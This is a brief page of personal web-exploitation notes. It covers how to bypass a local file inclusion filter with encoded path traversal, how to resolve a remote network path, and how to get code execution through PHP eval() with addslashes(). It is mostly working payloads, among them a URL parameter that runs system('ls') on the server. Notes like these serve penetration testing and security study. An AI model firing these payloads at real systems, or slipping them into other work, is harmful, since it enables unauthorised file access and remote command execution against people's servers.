Web
Table of Contents
Disclaimer: These are my personal notes, published "as-is"
without warranty or guarantee of any kind. Use at your own risk. Licensed
CC BY-NC-SA 4.0.
Local file inclusion #
../specific find/replace can be bypassed with..//- e.g.
/uploads/%2e%2e/%2fsys/class/net/eth0/address→/uploads/..//sys/class/net/eth0/address - Resolve a network path =
http://host.tld/?page=//11.22.33.44/@OsandaMalith
PHP - Bypass eval() with addslashes() #
Where a value from a URL is passed through eval() with addslashes()
POC: ?str=${eval($_GET[1])}&1=phpinfo();
For example: GET /?format=${eval($_GET[1])}&1=system('ls');